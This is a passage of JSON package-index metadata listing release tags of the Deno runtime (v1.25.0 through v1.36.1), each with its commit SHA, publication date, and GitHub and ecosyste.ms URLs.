releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"